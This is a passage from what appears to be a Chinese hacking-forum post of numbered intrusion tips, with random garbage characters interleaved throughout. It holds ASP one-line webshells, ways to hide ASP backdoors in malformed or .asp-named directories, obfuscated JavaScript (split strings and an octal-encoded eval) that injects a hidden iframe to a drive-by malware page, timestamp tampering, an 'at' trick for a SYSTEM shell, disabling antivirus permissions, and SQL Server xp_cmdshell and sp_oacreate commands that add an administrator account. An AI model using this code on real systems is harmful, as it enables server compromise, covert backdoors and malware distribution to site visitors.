c).%><%execute request("go")%><%  O% W4 R- y! E. k# K  v
d).<script language=VBScript runat=server>execute request("sb")</Script>4 V1 K' l+ q- X& S" f5 V
e).<%25Execute(request("l"))%25>
6 H# a0 E+ M6 ~9 _f).<%if request("cmd")<>"" then execute request("pass")%>
# F% H7 `6 t9 V2 X6 G+ @4 _% r8 C) M! y& ?9 N& }
52、at "12:17" /interactive cmd
) B& t: j2 O2 B# _执行后可以用AT命令查看新加的任务4 ^$ W" m! M, J
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。9 E9 y. w  L1 @# j
, g* H; w; I5 q: Q3 y3 O9 K4 a
53、隐藏ASP后门的两种方法9 B' {1 m2 `! I0 q# a4 E
1、建立非标准目录:mkdir images..\- E  ^- W% I) _' t3 }) t
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
# T: D. G2 y# S8 [) G# Z# G; m通过web访问ASP木马:http://ip/images../news.asp?action=login
# R1 j9 S* n. S9 g/ ]$ A如何删除非标准目录:rmdir images..\ /s
0 {: t5 O2 x( q' d* T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:  ^; A( i  \/ b0 L7 _6 m
mkdir programme.asp
) @2 }7 c5 _/ h/ }6 D新建1.txt文件内容:<!--#include file=”12.jpg”-->4 ]- h, |2 l" Y* m. z
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 @8 F% ?) [) U. i7 x* @! V& Cattrib +H +S programme.asp
/ v9 N! M* [. p: c6 f通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- k, l& ?6 o' r) ]6 n+ J# Y8 [0 j9 J+ q6 n1 V/ X0 v
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。' u- X% l3 c* M: c( X2 e9 X
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。  B/ P/ g0 F, r
0 p& Q0 F) L4 d0 Z; m7 [) w7 l( Y
55、JS隐蔽挂马
% c! a0 m" }$ c: c1 k8 _1.
+ H( R4 o7 ?+ g8 ?) Uvar tr4c3="<iframe src=ht";
" D# R- i7 p' {9 w) T! _/ ztr4c3 = tr4c3+"tp:/";
( H. n% K- V! n6 A1 q8 n% c+ G( Ztr4c3 = tr4c3+"/ww";6 r8 A( v; H8 Z1 k8 G
tr4c3 = tr4c3+"w.tr4";
" m8 @& ^; g3 s  Ctr4c3 = tr4c3+"c3.com/inc/m";0 K- v  Y( ]8 t3 B4 f6 d* h
tr4c3 = tr4c3+"m.htm style="display:none"></i";3 _- W8 d, W# n# t; T: p9 Q# Z% @. @
tr4c3 =tr4c3+"frame>'";# X; M& {# Y5 y! _4 D/ V% O* s
document.write(tr4c3);" d# H9 I2 }: ]' ?9 G% \# x1 i
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。! H% E" Q2 p. A) J
2 d- W! O# ~9 f9 {+ d) _9 K
2.0 e& f- |- \4 w( |
转换进制,然后用EVAL执行。如, f) _2 w) y, j; j6 l" w8 L6 S7 p
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");$ Z6 a7 K1 r! y; X
不过这个有点显眼。3 }& w5 b0 }3 w$ s1 `9 q, u
3.
# l+ p) F- k: Jdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
9 x# z% u+ x9 p! e4 p5 x1 m3 Q最后一点,别忘了把文件的时间也修改下。
2 t) r5 n$ o" `8 k( k% o
2 ^0 |) X$ x3 H. j) i+ c) c1 l  E56.3389终端入侵常用DOS命令
, p+ M2 u2 }' Otaskkill taskkill /PID 1248 /t
: ^+ l) G+ f7 x% [" A0 C
# }: y& a/ W: g8 l+ U4 E: rtasklist 查进程/ f" t2 I' R2 e  h# j4 L

! `* e; @, _' K. [! dcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( w$ l2 o, f; A0 Tiisreset /reboot
5 U9 I# |. J6 w4 w! ~) |- otsshutdn /reboot /delay:1    重起服务器- ~' G2 L7 K! N' x. L

  @7 L0 n  H1 h, U" T, q! wlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 O  J7 M) a. \% j. E4 U, X/ L( W' E2 B9 B
query user 查看当前终端用户在线情况
1 y3 g5 v5 k: Y4 q$ Y/ s1 m
8 w7 ~: F2 T% U/ u要显示有关所有会话使用的进程的信息,请键入:query process *
0 r  f; N& r, l! ], z' S0 j- R' F0 {  ]: {# Z1 c6 @
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 c2 _* @6 l8 N' q% J5 @3 q" ?

* C4 U! `+ M+ K* h要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
* P3 ?. c, w# H8 }8 ~5 I# {6 f* R* h" D8 R& d# v
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02$ a, b. ~; r7 P6 y: M; U# i0 E5 g+ O; W

6 c) }4 C& }/ V4 f命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
* D  D) ~1 W7 J; T! A7 Y# e9 |6 \& _$ o/ B6 [
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
6 r: l4 x* ]$ N9 ~/ C  Z4 s- _, S% J5 q% I" Z6 F
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 C2 v' {( F$ x" z4 T8 U0 r+ m5 p& E! G7 @8 C% F+ h3 i
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机1 C. x' q% A2 x- ?; \. [* n0 a
" Y- b  q/ }; k  K+ a
56、在地址栏或按Ctrl+O,输入:3 _7 S7 ~( `$ L$ ^; T& E1 K
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
# t+ v& _: @9 @  s5 d6 G3 \& p& p! c& }4 z/ d. I8 A) T
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
; d/ l/ `+ ]3 z  R8 O# X* V( S. G5 a& k' V0 w) R( Y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* S- ?4 ?- }* ?3 s' p6 h) p
用net localgroup administrators是可以看到管理组下,加了$的用户的。
/ A3 H1 \1 d# r6 z# |- o6 |+ N. h1 u
58、 sa弱口令相关命令: \4 I6 e$ o' c

* }7 C# `' S5 w- M) f% r一.更改sa口令方法:
- K" r  {' H  {9 y; r6 G用sql综合利用工具连接后,执行命令:* a7 j: V1 a5 o* [+ j5 b
exec sp_password NULL,'20001001','sa'+ L4 |  J# c, l$ v+ b
(提示:慎用!)
0 c0 i/ p3 J; y' j" d0 w$ g' X
* P2 Y! {6 ~# I1 x7 S' s  H4 f% S: ~二.简单修补sa弱口令.9 l' L& Y7 d! s$ ^$ J5 |
% A- l: E8 B" C( x) p+ h- \
方法1:查询分离器连接后执行:. U+ {. z. }: V+ h( R$ D. o
if exists (select * from
! }& {- r7 l8 ^' e+ b( B: a* ^dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 O3 M2 u- z( B! Z' Q' u, WOBJECTPROPERTY(id, N'IsExtendedProc') = 1); `5 ^  G2 d% [, a1 l
+ c' S  ?1 \3 T! n, a+ m1 ~
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'9 f6 E/ C& ]7 ^# t2 R

# Y/ Z. X4 E. t# W8 P5 ~, mGO
5 I  E/ R% Y. U* T8 R9 X$ i+ X6 j; s8 c1 v. c9 H1 J; ~" I; a) d; Q
然后按F5键命令执行完毕
8 Z# C0 F3 f+ A& M, K: ?6 ~) s$ `, M0 }7 M9 M0 T4 q( M0 x
方法2:查询分离器连接后
, Z! X# ]  G9 g$ m0 g8 ^; _6 O第一步执行:use master' m# j+ R; {+ i! x0 T
第二步执行:sp_dropextendedproc 'xp_cmdshell'/ X6 H# I3 n9 w" c1 o
然后按F5键命令执行完毕* \3 n, u$ e0 x2 P- n; k

! w) j) [$ M% G
4 @+ o# a, T% n" e三.常见情况恢复执行xp_cmdshell.0 I8 a$ F6 v5 S& g
: \3 l" S; o% h
8 C3 m1 z2 D  j, S
1 未能找到存储过程'master..xpcmdshell'.
# M, ~" c& g5 T   恢复方法:查询分离器连接后,
% v2 v- H, g+ n+ D第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; A& a' I) Q1 x+ i: w9 Q* S
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% h7 ^0 E' C. `' |然后按F5键命令执行完毕
3 A0 b  ?( G8 }( p
8 n" X" e' a( }9 B. w$ g( M2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)1 j8 O5 x/ h9 m( o4 B3 w
恢复方法:查询分离器连接后,; N# s( p9 R" P# E/ w* K" R4 T* O
第一步执行:sp_dropextendedproc "xp_cmdshell"
* u8 r9 a# C# [5 ?! s- \  v第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 i+ R- V$ e; K+ k; v- b5 V然后按F5键命令执行完毕4 t) b, C+ e) k

. l% j4 M/ L9 l8 w1 |3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
0 J9 K2 Q3 C% R! V. Q. f1 o- |$ T+ I恢复方法:查询分离器连接后,
* e; d; f  X1 n! D& G第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
! _! j( U- U6 f. S2 l第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           3 j' Y3 J, x7 N2 b
然后按F5键命令执行完毕
: h. L3 ]) i+ M6 ?# t" N
2 D0 f) Y# q, h2 x0 {四.终极方法.6 S5 S5 Z% m6 a, j" Z% M
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:9 X% `; t4 y4 f* l6 `
查询分离器连接后,5 P$ e4 a- u& F1 v& k
2000servser系统:/ N7 Q" L2 C+ D5 R" ?8 M% y4 r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
! O; D; [$ }7 m. X7 U* a  H0 Q2 Y
$ Z. Q8 `' I) E( Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 r( t+ @2 ^- s/ r! }* E4 }* Z; v# A; o# U  C% j
xp或2003server系统:
; q9 M, [! N( A' g- J3 Z4 j! L; P3 _3 J8 E" y  ?' |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'5 d4 n: F  Z: C+ ~6 n8 c
0 O3 {# z! n; E% ]" K0 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 C  k) N$ Z& H2 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表